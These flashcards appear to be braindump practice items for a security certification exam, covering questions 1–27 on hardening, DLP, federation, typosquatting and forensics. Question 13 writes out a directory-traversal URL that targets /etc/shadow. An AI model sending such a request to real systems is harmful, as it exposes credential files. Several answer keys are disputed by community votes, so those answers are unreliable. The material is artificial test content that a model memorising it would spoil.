Braindumps.351-400 Flashcards

1
Q

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?

a. TFTP was disabled on the local hosts.
b. SSH was turned off instead of modifying the configuration file.
c. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
d. Network services are no longer running on the NAS.

A

b. SSH was turned off instead of modifying the configuration file.

Here’s the reasoning:

Disabling remote logins to the NAS was most likely done by stopping the SSH service entirely. SCP (Secure Copy Protocol) runs on top of SSH, so turning SSH off breaks SCP file transfers as well.

The proper approach would have been to modify the SSH daemon’s configuration file (sshd_config) to refuse interactive shell logins while still permitting SCP/SFTP transfers. The fact that users can still view the data from their PCs (over file-sharing protocols such as SMB or NFS, which do not rely on SSH) while SCP fails points to SSH having been turned off rather than selectively configured.
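If the NAS runs a Linux-based OS with OpenSSH, the intended hardening would normally be an sshd_config change rather than stopping the service. A minimal illustrative fragment (the group name is hypothetical, and exact directives vary by NAS firmware):

```
# /etc/ssh/sshd_config -- illustrative fragment, not vendor-specific NAS syntax.
# Stopping sshd entirely (e.g., systemctl disable --now sshd) also breaks SCP,
# because SCP tunnels over SSH. Restricting the session instead keeps transfers:
Match Group nas-users          # hypothetical group of file-transfer-only users
    ForceCommand internal-sftp # no interactive shell; SFTP (and SFTP-mode scp) still works
    PermitTTY no
```

Note that classic (exec-based) scp would also stop working under ForceCommand internal-sftp; OpenSSH 9.0+ scp defaults to the SFTP protocol and is unaffected.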

2
Q

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

a. Bug bounty
b. Black-box
c. Gray-box
d. White-box

A

c. Gray-box testing.

Here’s why:

Black-box testing typically involves testing without any prior knowledge of the internal workings of the application or network. The tester starts with no information about the internal structure, code, or architecture.

White-box testing involves testing where the tester has full knowledge of the internal workings, including access to source code, architecture diagrams, and documentation.

Gray-box testing falls between black-box and white-box testing. In gray-box testing, the tester has partial knowledge of the internal workings of the application or network. In this scenario, the security firm has been provided with documentation available to customers of the applications. This partial knowledge allows the testers to conduct a more targeted and effective assessment, leveraging the information they have about the application's functionality, interfaces, and potentially some internal workings, while still simulating the perspective of an external attacker to some extent.

Therefore, the BEST representation of the type of testing that will occur in this scenario is Gray-box testing.

3
Q

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

a. Disable Telnet and force SSH.
b. Establish a continuous ping.
c. Utilize an agentless monitor.
d. Enable SNMPv3 with passwords.

A

c. Utilize an agentless monitor.

Here’s why this is the best choice:

Agentless monitoring involves using monitoring tools that do not require the installation of agents or software on the monitored devices. This approach is generally preferred because it reduces the overhead associated with deploying and maintaining agents across numerous devices.

Agentless monitoring can gather information through protocols like SNMP (Simple Network Management Protocol), WMI (Windows Management Instrumentation), SSH (Secure Shell), and others, depending on the type of devices being monitored. It can provide comprehensive visibility into network performance, availability, and security posture without the need for agents.

Let’s briefly discuss why the other options are not as optimal:

a. Disable Telnet and force SSH: This is a security recommendation rather than a method for monitoring network operations. While it enhances security by using SSH instead of Telnet for remote access, it doesn't directly relate to network monitoring.

b. Establish a continuous ping: Continuous pinging can be useful for basic network connectivity testing, but it's not comprehensive enough for monitoring network operations in terms of performance, security, and other critical metrics.

d. Enable SNMPv3 with passwords: SNMPv3 is a secure version of SNMP that adds authentication and encryption, and it is a sensible way to secure device polling. However, it is a single protocol setting rather than a complete monitoring method: it covers only SNMP-capable devices and says nothing about how the collected data is aggregated, correlated, or reported. An agentless monitoring platform can use SNMPv3 as one of several collection protocols, which makes the agentless monitor the broader and better answer.
4
Q

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities. Which of the following would BEST meet this need?

a. CVE
b. SIEM
c. SOAR
d. CVSS

A

d. CVSS (Common Vulnerability Scoring System)

Here’s why CVSS is the best choice:

CVSS (Common Vulnerability Scoring System) is a standardized system for assessing and communicating the severity of vulnerabilities. It assigns a score to vulnerabilities based on metrics such as exploitability, impact, and complexity, providing a numerical representation of the severity level.

CVSS scores range from 0 to 10, with higher scores indicating more severe vulnerabilities. This numerical scale helps leadership teams quickly understand the relative severity of vulnerabilities across the organization's systems and infrastructure.

CVE (Common Vulnerabilities and Exposures) is a dictionary of publicly known information security vulnerabilities and exposures but does not provide severity scoring directly. It lists vulnerabilities but does not quantify their severity in a standardized way.

SIEM (Security Information and Event Management) and SOAR (Security Orchestration, Automation, and Response) are tools and platforms used for monitoring, managing security events, and automating responses. While they are valuable for operational security, they do not directly provide a standardized severity scoring for vulnerabilities.

Therefore, CVSS is specifically designed to meet the need of communicating severity levels of vulnerabilities effectively to the leadership team, making it the most appropriate choice in this scenario.
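The mapping from a numeric base score to the label leadership usually sees follows the CVSS v3.1 qualitative severity scale. A small sketch:

```python
# Qualitative severity ratings from the CVSS v3.1 specification:
# 0.0 None, 0.1-3.9 Low, 4.0-6.9 Medium, 7.0-8.9 High, 9.0-10.0 Critical.
def cvss_severity(score: float) -> str:
    if not 0.0 <= score <= 10.0:
        raise ValueError("CVSS base scores range from 0.0 to 10.0")
    if score == 0.0:
        return "None"
    if score <= 3.9:
        return "Low"
    if score <= 6.9:
        return "Medium"
    if score <= 8.9:
        return "High"
    return "Critical"

cvss_severity(9.8)  # -> "Critical"
cvss_severity(5.3)  # -> "Medium"
```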

5
Q

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

a. CYOD
b. MDM
c. COPE
d. VDI

A

d. VDI (Virtual Desktop Infrastructure)

Here’s why VDI is the most appropriate choice:

VDI (Virtual Desktop Infrastructure) allows employees to access a desktop environment hosted on a centralized server or cloud platform. This environment is managed by the company and provides a consistent desktop experience regardless of the device used by the employee.

In the scenario described, employees are using their personal computers (BYOD - Bring Your Own Device) to access the company's cloud computing environment. With VDI, the company manages the operating system and desktop environment centrally, ensuring security and control over corporate data and applications.

CYOD (Choose Your Own Device) typically involves employees selecting a device from a set of approved options provided by the company. This model does not align with employees using their personal computers.

MDM (Mobile Device Management) and COPE (Corporate-Owned, Personally-Enabled) are more focused on managing mobile devices (MDM) or company-provided devices (COPE), rather than personal computers accessing cloud resources.

Therefore, VDI is the deployment model implemented by the company in this scenario, allowing employees to securely access a managed desktop environment from their personal devices while keeping company data and applications centralized and controlled.

6
Q

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?

a. IDS solution
b. EDR solution
c. HIPS software solution
d. Network DLP solution

A

d. Network DLP (Data Loss Prevention) solution

Here’s why Network DLP is the most suitable choice:

Network DLP solutions are specifically designed to monitor and inspect data transmitted over the network in real-time. They can detect sensitive information based on predefined rules and policies, including PII and credit card numbers.

These solutions can analyze network traffic, including email, web traffic, file transfers, and other communications channels, to identify and prevent the unauthorized transmission of sensitive data.

IDS (Intrusion Detection System), EDR (Endpoint Detection and Response), and HIPS (Host-based Intrusion Prevention System) are important security tools but are typically focused on different aspects of security monitoring and threat detection, such as endpoint behavior, network intrusion attempts, or host-based security.

For the specific requirement of inspecting in-transit files for sensitive data across the enterprise network, a Network DLP solution is designed to provide the necessary visibility and control.

Therefore, Network DLP solution is the best option for the security administrator to use in order to inspect in-transit files and detect sensitive data like PII and credit card information on the enterprise network.
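Network DLP rules commonly pair pattern matching with validation to cut false positives. A minimal sketch of the credit-card check such a rule might apply (a regex for digit runs plus the Luhn checksum; the function names are illustrative):

```python
import re

# Sketch of a DLP-style detector: find 13-16 digit runs (spaces/hyphens
# allowed), then validate with the Luhn checksum so arbitrary digit
# strings are not flagged as card numbers.
CARD_RE = re.compile(r"\b(?:\d[ -]?){13,16}\b")

def luhn_valid(number: str) -> bool:
    digits = [int(d) for d in number if d.isdigit()]
    checksum = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # double every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        checksum += d
    return checksum % 10 == 0

def find_card_numbers(text: str) -> list[str]:
    return [m.group() for m in CARD_RE.finditer(text) if luhn_valid(m.group())]

# Only the Luhn-valid test card number is reported, not the plain digit run.
hits = find_card_numbers("invoice ref 1234567890123, card 4111 1111 1111 1111")
```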

7
Q

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

a. SSO
b. MFA
c. PKI
d. DLP

A

a. SSO (Single Sign-On)

Here’s an explanation:

SAML (Security Assertion Markup Language) is a protocol used for exchanging authentication and authorization data between parties, particularly between an identity provider (IdP) and a service provider (SP). It allows for the creation and management of federated identities.

Single Sign-On (SSO) is a user authentication process that permits a user to enter one set of credentials (such as a username and password) to access multiple applications and services. SSO relies heavily on SAML to enable this seamless authentication across different systems and organizations.

MFA (Multi-Factor Authentication) is a security system that requires more than one method of authentication from independent categories of credentials to verify the user's identity. While SAML can support MFA, federating identities specifically enables SSO.

PKI (Public Key Infrastructure) is a framework for creating a secure method for exchanging information based on public key cryptography. It is not directly related to federating identities with SAML.

DLP (Data Loss Prevention) refers to strategies and tools used to prevent sensitive data from being lost, misused, or accessed by unauthorized users. It is not directly related to federating identities with SAML.

Therefore, federating user digital identities using SAML-based protocols primarily enables Single Sign-On (SSO).

8
Q

An employee’s company account was used in a data breach. Interviews with the employee revealed:

*The employee was able to avoid changing passwords by using a previous password again.
*The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

a. Geographic dispersal
b. Password complexity
c. Password history
d. Geotagging
e. Password lockout
f. Geofencing

A

c. Password history

Explanation: Enforcing password history ensures that users cannot reuse previous passwords, thereby enhancing password security.

f. Geofencing

Explanation: Geofencing restricts access based on geographic locations, preventing logins from unauthorized or unexpected regions, such as hostile foreign nations where the employee has never traveled.

These measures will address the problems of password reuse and unauthorized access from foreign locations.
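A password-history control amounts to keeping hashes of the last N passwords and rejecting any candidate that matches one. A toy sketch (plain SHA-256 keeps the example short; real systems use salted, slow hashes such as bcrypt or Argon2):

```python
import hashlib
from collections import deque

# Toy sketch of a password-history check with a configurable depth.
class PasswordHistory:
    def __init__(self, depth: int = 5):
        self.history = deque(maxlen=depth)  # hashes of the last `depth` passwords

    @staticmethod
    def _digest(password: str) -> str:
        return hashlib.sha256(password.encode()).hexdigest()

    def change_password(self, new_password: str) -> bool:
        if self._digest(new_password) in self.history:
            return False                    # recent password reused: rejected
        self.history.append(self._digest(new_password))
        return True

h = PasswordHistory(depth=5)
h.change_password("Spring2024!")           # accepted (True)
reused = h.change_password("Spring2024!")  # rejected (False): still in history
```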

9
Q

A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file server’s IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

a. Segmentation
b. Firewall allow list
c. Containment
d. Isolation

A

(Community A : 81%, B : 19%)
a. Segmentation

Explanation: Network segmentation involves dividing the network into smaller, isolated segments to limit access and control traffic between different parts of the network. By segmenting the network, the security manager can ensure that the smart generator can still send alerts to third-party maintenance personnel while preventing it from communicating with internal file servers, thereby maintaining alerting capabilities and enhancing security.

10
Q

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

a. File integrity monitoring
b. Honeynets
c. Tcpreplay
d. Data loss prevention

A

d. Data loss prevention

Explanation: Data loss prevention (DLP) technologies are designed to monitor, detect, and block the transmission of specific types of sensitive information across a network. DLP can be configured to look for and take action on particular file types being transmitted, ensuring that sensitive data does not leave the network without proper authorization.

11
Q

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

a. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
b. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
c. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022
d. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

A

c. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

Explanation: This certificate rotates annually (it is valid for just under one year) and contains a wildcard only at the secondary subdomain level (*.app1.comptia.org). Options a and d place the wildcard at the first subdomain level, and option d is also valid for two years, violating the annual rotation requirement; option b contains no wildcard.
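The scoping matters because a certificate wildcard covers exactly one DNS label: *.app1.comptia.org matches api.app1.comptia.org but not app1.comptia.org itself, nor hosts two levels deeper. A sketch of that single-label matching rule:

```python
# Sketch of single-label wildcard matching as applied to certificate
# names: a "*" stands in for exactly one DNS label.
def wildcard_matches(pattern: str, hostname: str) -> bool:
    p_labels = pattern.lower().split(".")
    h_labels = hostname.lower().split(".")
    if len(p_labels) != len(h_labels):   # wildcard never spans extra labels
        return False
    return all(p == "*" or p == h for p, h in zip(p_labels, h_labels))

wildcard_matches("*.app1.comptia.org", "api.app1.comptia.org")   # True
wildcard_matches("*.app1.comptia.org", "app1.comptia.org")       # False: label count differs
wildcard_matches("*.app1.comptia.org", "a.b.app1.comptia.org")   # False: "*" covers one label
```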

12
Q

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization’s executives determine their next course of action?

a. An incident response plan
b. A communication plan
c. A disaster recovery plan
d. A business continuity plan

A

d. A business continuity plan

Explanation: A business continuity plan (BCP) is designed to help organizations continue operating during and after a disruption, such as a global pandemic. It provides strategies for maintaining essential functions, managing reduced staffing, and making informed decisions on business operations. An incident response plan, communication plan, and disaster recovery plan are important but are more specific in scope and do not comprehensively address the wide-ranging impacts of a pandemic on business operations.

13
Q

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?

a. http://sample.url.com/
b. http://sample.url.com/someotherpageonsite/../../../etc/shadow
c. http://sample.url.com/select-from-database-where-password-null
d. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

A

b. http://sample.url.com/someotherpageonsite/../../../etc/shadow

Explanation: A directory traversal attack occurs when an attacker uses sequences like ../ to move up the directory hierarchy and access files outside of the web server’s root directory. The URL http://sample.url.com/someotherpageonsite/../../../etc/shadow shows such a pattern, indicating an attempt to access the sensitive /etc/shadow file, which typically contains hashed passwords for users on Unix-based systems. This is a classic example of a directory traversal attack.
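The server-side defense is to normalize the requested path and confirm it still resolves under the web root. A minimal sketch (the web root path is a hypothetical example):

```python
import posixpath

WEB_ROOT = "/var/www/html"   # hypothetical document root

# Sketch: join the requested URL path onto the web root, normalize away
# "../" segments, and reject anything that escapes the root directory.
def is_traversal(url_path: str) -> bool:
    resolved = posixpath.normpath(posixpath.join(WEB_ROOT, url_path.lstrip("/")))
    return not (resolved == WEB_ROOT or resolved.startswith(WEB_ROOT + "/"))

is_traversal("someotherpageonsite/../../../etc/shadow")  # True: escapes the root
is_traversal("images/logo.png")                          # False: stays under the root
```

This sketch handles plain "../" sequences only; a production check would also decode percent-encoded variants (such as %2e%2e%2f) before normalizing.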

14
Q

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack?

a. Reconnaissance
b. Impersonation
c. Typosquatting
d. Watering-hole

A

c. Typosquatting

Explanation: Typosquatting is a type of cyber attack where an attacker registers domain names that are similar to legitimate ones, often exploiting common typing errors. In this case, the attacker registered http://comptiia.org, which closely resembles http://comptia.org, to deceive users into thinking they are visiting the legitimate site.
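Typosquatting works because the lookalike domain sits a tiny edit distance from the real one: comptiia.org is a single character insertion away from comptia.org. A sketch of the Levenshtein-distance check a brand-monitoring tool might run over newly registered domains:

```python
# Sketch of Levenshtein edit distance: the minimum number of single-character
# insertions, deletions, or substitutions separating two strings
# (classic Wagner-Fischer dynamic programming, two rows at a time).
def edit_distance(a: str, b: str) -> int:
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        curr = [i]
        for j, cb in enumerate(b, 1):
            cost = 0 if ca == cb else 1
            curr.append(min(prev[j] + 1,          # deletion
                            curr[j - 1] + 1,      # insertion
                            prev[j - 1] + cost))  # substitution
        prev = curr
    return prev[-1]

edit_distance("comptia.org", "comptiia.org")  # 1: one inserted "i"
```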

15
Q

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

a. NAC
b. ACL
c. WAF
d. NAT

A

b. ACL

Explanation: An Access Control List (ACL) is the best configuration for this requirement because it allows the company to specify which external service providers can access the internal website. ACLs can be configured to permit or deny traffic based on IP addresses, ensuring that only a limited number of specific, external service providers can reach the website in a secure manner.
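As an illustration, a Cisco-style extended ACL restricting the published site to two known provider addresses might look like the following (all addresses are hypothetical values from the RFC 5737 documentation ranges, and the ACL name is made up):

```
! Illustrative Cisco-style extended ACL; provider and server addresses
! are hypothetical RFC 5737 documentation values.
ip access-list extended MARKETING-SITE-IN
 remark allow only the two approved external service providers over HTTPS
 permit tcp host 203.0.113.10 host 192.0.2.50 eq 443
 permit tcp host 203.0.113.25 host 192.0.2.50 eq 443
 deny ip any host 192.0.2.50
```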

16
Q

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the issue?

a. A non-disclosure agreement
b. Least privilege
c. An acceptable use policy
d. Offboarding

A

d. Offboarding

Explanation: The issue of a departed executive’s accounts still being accessible could have been addressed through a proper offboarding process. Offboarding includes revoking access to company systems and data, ensuring that former employees can no longer log in or access sensitive information after they leave the organization. This would prevent the departed executive from logging in and protect the company from potential data breaches.

17
Q

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

a. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
b. The MRI vendor does not support newer versions of the OS.
c. Changing the OS breaches a support SLA with the MRI vendor.
d. The IT team does not have the budget required to upgrade the MRI scanner.

A

b. The MRI vendor does not support newer versions of the OS.

Explanation: The most likely reason preventing the IT manager from upgrading the specialized OS is that the MRI vendor does not support newer versions of the operating system. Many medical devices, like MRI scanners, use specialized software that is tightly integrated with specific OS versions. If the vendor does not provide support for newer OS versions, upgrading could lead to compatibility issues, loss of functionality, and lack of vendor support for troubleshooting and maintenance. This situation is common in the medical industry, where devices often rely on specific configurations approved by regulatory bodies and the device manufacturers.

18
Q

A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

a. NIST CSF
b. GDPR
c. PCI DSS
d. ISO 27001

A

b. GDPR

Explanation: The “right to be forgotten” is a provision under the General Data Protection Regulation (GDPR), which is a comprehensive data protection law in the European Union. GDPR gives individuals the right to request the deletion of their personal data from an organization’s systems under certain conditions. This request is also known as the right to erasure. Organizations subject to GDPR are legally required to comply with such requests, provided that no overriding lawful reason for retaining the data exists.

19
Q

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

a. Adding a new UPS dedicated to the rack
b. Installing a managed PDU
c. Using only a dual power supplies unit
d. Increasing power generator capacity

A

b. Installing a managed PDU

Explanation: A managed Power Distribution Unit (PDU) allows for better monitoring and control of power usage in a network rack. It provides detailed insights into power consumption at the outlet level, enabling the identification and prevention of unauthorized use of power outlets. This solution does not compromise the number of available outlets and helps to manage and balance the power load efficiently.

20
Q

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer implement?

a. CASB
b. WAF
c. Load balancer
d. VPN

A

(Community B 69%, A 24%)
b. WAF (Web Application Firewall)

CASBs primarily focus on securing and controlling the use of cloud services and data, while a Web Application Firewall (WAF) is specifically designed to protect web applications and inspect traffic to web servers for security threats.

Explanation: A Web Application Firewall (WAF) is specifically designed to protect web applications by filtering and monitoring HTTP traffic between a web application and the Internet. It can inspect incoming traffic to the web servers, detect and filter out malicious requests, and provide detailed logging and monitoring capabilities. This helps ensure the security and integrity of the web servers in the cloud environment.

21
Q

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these requirements? (Choose two.)

a. Full device encryption
b. Network usage rules
c. Geofencing
d. Containerization
e. Application approve list
f. Remote control

A

(Braindump : d. Containerization, f. Remote control)

Case for D & F:
While full-device encryption is a valuable security measure, it primarily protects data at rest and would not necessarily prevent data exfiltration if the device is unlocked.

Geofencing triggers an action when a mobile device enters or leaves a set location, which can be useful for managing devices in specific locations but does not directly prevent data exfiltration.

In summary, while all these features contribute to the overall security of a device, the remote control feature of MDM is the most directly relevant to limiting data exfiltration in the event of a device being lost or stolen.

(Community AD : 51%, DF 36%)

ChatGPT : D & F

d. Containerization
f. Remote control
Explanation:

Containerization:
    Purpose: Containerization allows the separation of corporate data and personal data on BYOD devices. This ensures that company emails and other corporate data are stored in a secure, isolated environment.
    Benefit: This method protects corporate data and can enforce policies specifically for the container without affecting the personal data on the device. It also simplifies the process of wiping only the corporate data if the device is lost or stolen.

Remote control:
    Purpose: Remote control allows the security team to manage and interact with the device remotely.
    Benefit: This capability is crucial for performing actions such as remote wipe or lock if a device is lost or stolen, thus preventing unauthorized access to company emails and other sensitive data.

Additional Context:

Full device encryption: While this helps protect data at rest, it does not specifically address the control over company emails or selective data exfiltration prevention.
Network usage rules: These can help in managing data usage but do not specifically control email data or offer capabilities for lost/stolen device scenarios.
Geofencing: This can be useful for restricting device usage based on location but does not directly address email control or data exfiltration.
Application approve list: This can prevent the installation of unauthorized applications but does not specifically manage or protect company emails.

Therefore, containerization and remote control are the best choices to meet the specified requirements.

22
Q

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

a. IPSec
b. SFTP
c. SRTP
d. LDAPS
e. S/MIME
f. SSL VPN

A

(Community : AF 75%, AE 17%)

a. IPSec (Internet Protocol Security): IPSec provides strong security features for IP communications by authenticating and encrypting each IP packet in a communication session. It ensures data integrity, confidentiality, and authenticity, making it a robust choice for securing remote access VPN connections.

f. SSL VPN (Secure Sockets Layer Virtual Private Network): SSL VPNs use SSL/TLS protocols to provide secure remote access to internal network resources. They are designed to securely transport corporate data over the public internet by encrypting the entire communication session between the client and the VPN gateway. SSL VPNs are widely used for their ease of deployment and strong encryption capabilities.

These two options, IPSec and SSL VPN, are widely recognized for their ability to provide secure remote access over the internet. They offer encryption, authentication, and integrity protection, making them suitable for ensuring the security of communications between geographically dispersed employees and the corporate network.

23
Q

A malicious actor recently penetrated a company’s network and moved laterally to the data center. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

a. Security
b. Application
c. Dump
d. Syslog

A

c. Dump

A memory dump (often referred to as a memory image or core dump) is a snapshot of the contents of the server’s volatile memory (RAM) at a specific point in time. It contains a copy of the active processes, data structures, and potentially other details like network connections, opened files, and other volatile system state information. Analyzing a memory dump can provide insights into the activities that occurred on the server, including details about the actions taken by the malicious actor.

The other options are less likely to contain the detailed memory contents needed for forensic investigation:

a. Security: Typically refers to security-related configurations, logs, or policies.
b. Application: Contains information related to specific applications running on the server, but not necessarily memory contents.
d. Syslog: Contains logs generated by the system and applications, which are valuable for understanding events and activities but do not provide direct memory contents.

Therefore, the correct file to provide to the forensics firm for investigating what was in the memory on the compromised server is c. Dump (memory dump).

24
Q

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?

a. SaaS
b. IaaS
c. PaaS
d. SDN

A

a. SaaS (Software as a Service)

Here’s why SaaS is the correct choice:

SaaS delivers software applications over the internet, typically on a subscription basis. The applications are managed by a third-party provider (cloud service provider), which handles maintenance, updates, security, and infrastructure management.

With SaaS, the company does not need to manage or control the underlying cloud infrastructure (servers, networking, storage) or the software application itself. The responsibility for infrastructure support, application maintenance, and security patches lies with the SaaS provider.

This model is ideal for minimizing the company's technology footprint because it offloads almost all infrastructure and application support tasks to the SaaS provider. The company primarily focuses on using the application and managing user access and configurations rather than maintaining server hardware, operating systems, or application software.

In contrast, let’s briefly discuss the other options:

b. IaaS (Infrastructure as a Service): Provides virtualized computing resources over the internet. The company manages applications, data, runtime, and middleware, but the cloud provider manages virtualization, servers, storage, and networking.

c. PaaS (Platform as a Service): Provides a platform allowing customers to develop, run, and manage applications without the complexity of building and maintaining the infrastructure. The cloud provider manages the platform infrastructure and the company manages the applications and data.

d. SDN (Software-Defined Networking): Refers to the virtualization of network services, which can optimize and manage network resources dynamically. It is not directly related to minimizing infrastructure or application support for CRM systems.

Therefore, a. SaaS is the option that requires the least infrastructure and application support from the company when migrating a CRM system to the cloud.

25
Q

A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider? (Choose two.)

a. Chain of custody
b. Tags
c. Reports
d. Time stamps
e. Hash values
f. Time offset

A

(Community DF 90%)

d. Time stamps
f. Time offset

d. Time stamps: Time stamps indicate when each log entry was recorded. By analyzing time stamps, the administrator can sequence the events in chronological order, which is crucial for understanding the timeline of events and identifying any anomalies or suspicious activities.

f. Time offset: Time offset refers to the difference in time between different logs or systems. It’s important to consider because servers within a farm may not all be synchronized perfectly. Understanding and adjusting for time offsets helps in accurately correlating events across different servers or logs within the farm.

Here’s a brief explanation of the other options:

a. Chain of custody: Chain of custody refers to the chronological documentation or paper trail that records the sequence of custody, control, transfer, analysis, and disposition of physical or electronic evidence. While important in forensic investigations, it doesn't directly aid in determining the sequence of server logs.

b. Tags: Tags can be metadata or labels associated with log entries, but they do not inherently determine the sequence of logs. They provide additional information for categorization and filtering.

c. Reports: Reports are summaries or analyses derived from logs but do not directly determine the sequence of logs themselves.

e. Hash values: Hash values are cryptographic representations of data for integrity verification but are not used to determine the sequence of logs.

Therefore, the most relevant considerations for determining the sequence of a server farm’s logs are d. Time stamps and f. Time offset.

(Braindump : d. Time stamps, e. Hash values)
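The two factors above can be combined programmatically. Here is a minimal Python sketch (server names, offsets, and log entries are hypothetical) that normalizes each log entry against its server's clock offset before sorting, which is exactly the correlation step the administrator needs:

```python
from datetime import datetime, timedelta

# Hypothetical per-server clock offsets, in seconds ahead of the reference clock
offsets = {"web01": 0, "web02": 45, "db01": -30}

logs = [
    ("web02", "2024-05-01T10:00:50", "login"),
    ("web01", "2024-05-01T10:00:10", "request"),
    ("db01",  "2024-05-01T09:59:55", "query"),
]

def normalized(entry):
    server, ts, _ = entry
    t = datetime.fromisoformat(ts)
    # Subtract the server's offset to map its local time stamp
    # onto the common reference clock before comparing entries.
    return t - timedelta(seconds=offsets[server])

for server, ts, event in sorted(logs, key=normalized):
    print(server, event)
```

Note that sorting on the raw time stamps alone would place the db01 query first; only after applying the offsets does the true sequence (web02 login, then web01 request, then db01 query) emerge.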

26
Q

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

a. To provide data to quantify risk based on the organization’s systems
b. To keep all software and hardware fully patched for known vulnerabilities
c. To only allow approved, organization-owned devices onto the business network
d. To standardize by selecting one laptop model for all users in the organization

A

(Community : A 47%, B 38%, C 15%)
a. To provide data to quantify risk based on the organization’s systems.

Here’s why:

Quantifying risk: Asset management policies help identify and catalog all hardware and software assets within the organization. This information is crucial for assessing the organization's overall security posture and identifying vulnerabilities that could be exploited. By understanding the scope and nature of its assets, an organization can effectively prioritize and allocate resources to manage and mitigate risks.

Let’s briefly evaluate the other options:

b. To keep all software and hardware fully patched for known vulnerabilities: While this is important and often a part of asset management practices, it focuses more on operational security and vulnerability management rather than the comprehensive risk assessment provided by asset management.

c. To only allow approved, organization-owned devices onto the business network: This relates more to network access control and device management policies rather than asset management, although asset management may support this effort by identifying unauthorized devices.

d. To standardize by selecting one laptop model for all users in the organization: This aims for consistency and simplicity in management but does not directly address the broader security benefits of asset management, such as risk assessment and mitigation.

Therefore, option a. To provide data to quantify risk based on the organization’s systems is the best reason because it highlights how asset management policies contribute directly to understanding and managing security risks across the organization.

27
Q

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

a. Mandatory
b. Rule-based
c. Discretionary
d. Role-based

A

a. Mandatory

Mandatory Access Control (MAC) is designed precisely for situations where strict access control is needed based on data sensitivity and security clearances. Here’s why it’s suitable:

Classification and granular planning: MAC enforces access control policies based on data classifications (e.g., top secret, secret, confidential) and security labels attached to subjects (users, processes) and objects (files, resources). This aligns perfectly with the requirement to secure top secret data through precise classification and planning.

Need-to-know basis: MAC ensures that access is granted strictly on a need-to-know basis, meaning users can only access data if they have the necessary security clearance and explicit authorization, regardless of the discretion of data owners or administrators.

In contrast, let’s briefly clarify the other options:

b. Rule-based: Rule-based access control applies fixed rules (such as firewall-style conditions) uniformly to all access requests, but it does not enforce the hierarchical security labels and clearances required for top secret data in government settings.

c. Discretionary: Discretionary Access Control (DAC) grants access rights based on the discretion of the data owner or resource custodian. It does not provide the level of control needed for top secret data where access must be strictly controlled based on security clearances and classifications.

d. Role-based: Role-Based Access Control (RBAC) assigns permissions to users based on their roles within an organization. While useful for managing permissions at a broader organizational level, it does not enforce the strict labeling and hierarchical access control needed for top secret data in government contexts.

Therefore, a. Mandatory Access Control (MAC) is the most appropriate access control schema for the security administrator to consider in this scenario to ensure that top secret data is secured and access is granted on a need-to-know basis according to strict classification and planning principles.

28
Q

